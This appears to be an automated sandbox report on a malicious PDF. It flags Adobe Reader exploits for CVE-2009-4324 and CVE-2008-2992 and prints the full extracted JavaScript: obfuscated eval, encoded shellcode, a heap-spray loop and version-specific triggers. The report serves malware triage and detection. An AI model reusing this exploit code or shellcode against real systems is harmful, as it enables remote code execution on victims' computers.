MALICIOUS
168
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 JavaScript/JScript
The PDF contains embedded JavaScript, indicated by multiple heuristic hits and the presence of a javascript_obj0016_000.js artifact. The ML classifier strongly suggests malicious intent. The embedded JavaScript is likely designed to perform malicious actions, such as downloading a second-stage payload or exploiting vulnerabilities, although the exact functionality cannot be determined without deobfuscation; the two critical heuristic matches below (media.newPlayer and util.printf in the decompressed stream) indicate which Adobe Reader vulnerabilities the script targets. The benign URLs found are standard PDF namespaces and do not indicate malicious activity.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9957
Heuristics (5)
- media.newPlayer — CVE-2009-4324 [critical · CVE exact · CVE_2009_4324] — PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
- util.printf — CVE-2008-2992 [critical · CVE exact · CVE_2008_2992] — PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
- JavaScript action [low · 1 related finding · PDF_JAVASCRIPT] — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream [low · PDF_JS] — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL [info · EMBEDDED_URL] — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# — in PDF document text
  - http://ns.adobe.com/xap/1.0/ — in PDF document text
  - http://purl.org/dc/elements/1.1/ — in PDF document text
  - http://ns.adobe.com/xap/1.0/mm/ — in PDF document text
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0016_000.js | pdf-javascript-stream | PDF /JS object 16 at offset 0x2FE | 4333 bytes |
| SHA-256: 3955fe30e7b673d35cbc14d8419c334803ff259dacc720f3dc2d5fa0b6513098 | | | |
Preview script — first 1,000 lines of the extracted script
xxxxx='ev';yyyyy='al';zzzzz=xxxxx+yyyyy;aaaaa=app;try {} catch(e)
{zzzzz=1;aaaaa=1;}try {d=nothis_nothis;zzzzz=1;aaaaa=1;} catch(e) {}aaaaa[zzzzz]('ddddd'+'dd=une'+'sca'/**/+/**/'pe;');try {adsfadsf=e2e2;ddddddd=1;} catch(e) {}dxdxdx=aaaaa[zzzzz];this.zoom = this.zoom*1;var XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL = ddddddd(ddddddd("%25u4141%25u4141%25u4141%25u01e8%25u0000%25u0000%25u0c8b%25u8324%25u04c4%25u498d%25u4112%25u3180%25u8089%25u9039%25uf775%25udb62%25u02bf%25ub5fc%25u02bf%25ubcfd%25u8af1%25udf7c%25u02b7%25ua9ff%25u7c8a%25u40ba%25uc8c0%25uba24%25ubf52%25u3786%25ua19d%25u5fb3%25u81fd%25u4248%25u8a84%25uc953%25u6662%25u56b2%25u6efc%25ub7d7%25ud702%25u8aad%25uef54%25u02b7%25uc285%25u02b7%25u95d7%25u548a%25u02b7%25u028d%25u4c8a%25ufc4a%25ue5fb%25ue6e4%25ua7e7%25ue5ed%25u89e5%25u49ba%25u8aed%25ub9c9%25u86f1%25u02b7%25u85c9%25u02b7%25u95f9%25ub724%25uc902%25u6281%25ub785%25uc902%25ub7bd%25uc904%25ub7f5%25uc902%25u1cb5%25uba36%25u0343%25u61d2%25u7609%25u7676%25u6508%25u8889%25u8989%25ue1dd%25u8889%25u8989%25u5976%25ub136%25u25ab%25u616e%25u76e1%25u7676%25u52ba%25u7d02%25udadd%25udfda%25u5976%25u0736%25u87c7%25u6165%25u76dd%25u7676%25u650a%25ubf8d%25ua50a%25uecad%25u5976%25ud91c%25ubf36%25ua693%25u61f9%25u76b7%25u7676%25u02d4%25uba7d%25uda52%25udfda%25u8961%25u8989%25ud689%25u4e0a%25udec3%25u61da%25u8989%25u8989%25u0ad6%25u864e%25udcde%25u6502%25uc9c9%25uc9c9%25u76c9%25u3669%25u7711%25u8703%25u8461%25u7676%25u0276%25ue37d%25udf89%25u8961%25u8989%25ud689%25u4e0a%25ude86%25u02dc%25uc965%25uc9c9%25uc9c9%25u6976%25u6636%25u6947%25u61e9%25u7763%25u7676%25u76da%25uE159%25uFDFD%25uB3F9%25uA6A6%25uE5EA%25uFFE8%25uA7EC%25uECEB%25uEAA6%25uFAFA%25uEAA6%25uE5E8%25uA7EA%25uF1EC%25u89EC%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989"));
var IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp = ddddddd("%"+/**/"u0"+/**/"a0a"+/**/"%"+/**/"u"+/**/"0a"+/**/"0a");
var wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn = ddddddd(ddddddd("%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%25u4478%25u4a75%25u6457%25u6865%25u5846%25u496b%25u4d6b%25u4373%25u6756%25u5a58%25u575a%25u7856%25u4b54%25u5858%25u6543%25u7474%25u7273%25u4153%25u4b4e%25u6e70%25u516f%25u4345%25u7870%25u624c%25u7456%25u6e72%25u4743%25u4b4d"));
this.zoom = this.zoom*1;
var version = app.viewerVersion.toString();
try{mmm=do_not_do_this;} catch(e){lenlen = (0x150000/2);pppppp = 0x100000/2-0x200;lenlenlen = 700;}
if(version>=8.0)
{
lenlen = (0x10000/2);
pppppp = 32768-0x200;
lenlenlen = 0x1000;
}
while(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.length <= lenlen) IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp+=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp;
dxdxdx("IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.subst"+/********************/"ring(0,pppppp);");muuuuu=new Array();this.zoom = this.zoom*1;
for(i=0;i<lenlenlen;i++) {muuuuu[i]= IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp + XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL;}util.printd("zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw", new Date());
if(version>=8.0)
{
util.printd("UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt", new Date());
var xxx=ddddddd("this.%20%20%20me"+/**/"dia.%20%20%20new"+/**/"Play"+/**/"er%28nu"+/**/"ll%29%3B");
try {dxdxdx(xxx);} catch(e) {}
util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn, new Date());
}
if(version>=7.0 && version<8)
{
var la = '12999999999999999999';
for(ii=0;ii<276;ii++)
la += '8';
var yyy=ddddddd("util.%20%20%20pr"+/**/"%69%6etf"+/**/"%28%22%25"+/**/"%34%35%30%30%30%66"+/**/"%22%2C%6c%61%29%3B");
try{nnn=do_not_do_this;} catch(e){dxdxdx(yyy)}
}
|
|||